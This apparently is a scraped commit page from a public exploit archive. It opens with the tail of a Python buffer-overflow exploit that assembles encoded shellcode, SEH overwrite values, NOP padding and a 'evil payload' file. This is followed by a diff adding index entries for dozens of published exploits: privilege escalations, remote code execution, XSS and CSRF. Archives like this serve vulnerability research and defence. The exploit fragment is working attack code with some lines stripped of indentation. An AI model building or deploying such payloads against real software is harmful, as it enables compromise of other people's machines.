buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (700 - len(nseh) -len(seh) - len(junk) -len(nops) - len(buf))
payload = junk + nseh +seh + nops + buf + pad
exploit = payload
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

14
files_exploits.csv
View file

@ -6060,6 +6060,10 @@ id,file,description,date,author,type,platform,port
45223,exploits/windows_x86-64/dos/45223.py,"Restorator 1793 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64,
45226,exploits/windows_x86/dos/45226.py,"Prime95 29.4b7 - Denial Of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86,
45229,exploits/windows_x86/dos/45229.txt,"Project64 2.3.2 - Denial Of Service (PoC)",2018-08-21,"Gionathan Reale",dos,windows_x86,
45238,exploits/windows_x86/dos/45238.py,"Textpad 7.6.4 - Denial Of Service (PoC)",2018-08-22,"Gionathan Reale",dos,windows_x86,
45239,exploits/windows_x86-64/dos/45239.py,"UltraISO 9.7.1.3519 - Denial Of Service (PoC)",2018-08-22,"Ali Alipour",dos,windows_x86-64,
45241,exploits/windows_x86/dos/45241.py,"Easyboot 6.6.0 - Denial Of Service (PoC)",2018-08-22,"Gionathan Reale",dos,windows_x86,
45245,exploits/windows_x86/dos/45245.py,"Softdisk 3.0.3 - Denial Of Service (PoC)",2018-08-22,"Gionathan Reale",dos,windows_x86,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9881,6 +9885,7 @@ id,file,description,date,author,type,platform,port
45151,exploits/windows/local/45151.py,"AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)",2018-08-06,bzyo,local,windows,
45165,exploits/windows_x86-64/local/45165.py,"iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow",2018-08-08,"Rodrigo Eduardo Rodriguez",local,windows_x86-64,
45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64,
45171,exploits/windows/local/45171.vb,"Soroush IM Desktop App 0.17.0 - Authentication Bypass",2018-08-09,VortexNeoX64,local,windows,
45175,exploits/linux/local/45175.c,"Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read",2018-08-09,"Andrey Konovalov",local,linux,
45176,exploits/windows_x86-64/local/45176.py,"iSmartViewPro 1.5 - 'Password' Buffer Overflow",2018-08-10,"Javier Enrique Rodriguez Gutierrez",local,windows_x86-64,
45181,exploits/windows_x86/local/45181.py,"Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow",2018-08-13,"Shubham Singh",local,windows_x86,
@ -9888,6 +9893,9 @@ id,file,description,date,author,type,platform,port
45192,exploits/android/local/45192.txt,"Android - Directory Traversal over USB via Injection in blkid Output",2018-08-13,"Google Security Research",local,android,
45194,exploits/windows_x86-64/local/45194.py,"Wansview 1.0.2 - Denial of Service (PoC)",2018-08-14,"Gionathan Reale",local,windows_x86-64,
45205,exploits/linux/local/45205.txt,"WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)",2018-08-16,PeregrineX,local,linux,
45235,exploits/windows_x86/local/45235.py,"Project64 2.3.2 - Buffer Overflow (SEH)",2018-08-22,"Shubham Singh",local,windows_x86,
45243,exploits/linux/local/45243.txt,"Ghostscript - Multiple Vulnerabilities",2018-08-22,"Google Security Research",local,linux,
45244,exploits/windows/local/45244.txt,"Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation",2018-08-22,"Atredis Partners",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16704,7 +16712,7 @@ id,file,description,date,author,type,platform,port
45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
45218,exploits/windows_x86/remote/45218.py,"SEIG SCADA System 9 - Remote Code Execution",2018-08-19,"Alejandro Parodi",remote,windows_x86,12397
45220,exploits/windows_x86/remote/45220.py,"SEIG Modbus 3.4 - Remote Code Execution",2018-08-20,"Alejandro Parodi",remote,windows_x86,
45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,
@ -39812,6 +39820,7 @@ id,file,description,date,author,type,platform,port
45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
45240,exploits/hardware/webapps/45240.txt,"Geutebrueck re_porter 7.8.974.20 - Credential Disclosure",2018-08-22,"Kamil Suska",webapps,hardware,
45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80
45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,
@ -39834,3 +39843,6 @@ id,file,description,date,author,type,platform,port
45231,exploits/hardware/webapps/45231.rb,"Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)",2018-08-21,Alfie,webapps,hardware,
45232,exploits/php/webapps/45232.txt,"Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)",2018-08-21,L0RD,webapps,php,
45234,exploits/php/webapps/45234.txt,"Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection",2018-08-21,"Mostafa Gharzi",webapps,php,
45236,exploits/hardware/webapps/45236.txt,"ZyXEL VMG3312-B10B - Cross-Site Scripting",2018-08-22,"Samet ŞAHİN",webapps,hardware,
45237,exploits/php/webapps/45237.php,"KingMedia 4.1 - Remote Code Execution",2018-08-22,"Efrén Díaz",webapps,php,
45242,exploits/hardware/webapps/45242.txt,"Geutebrueck re_porter 16 - Cross-Site Scripting",2018-08-22,"Kamil Suska",webapps,hardware,

Can't render this file because it is too large.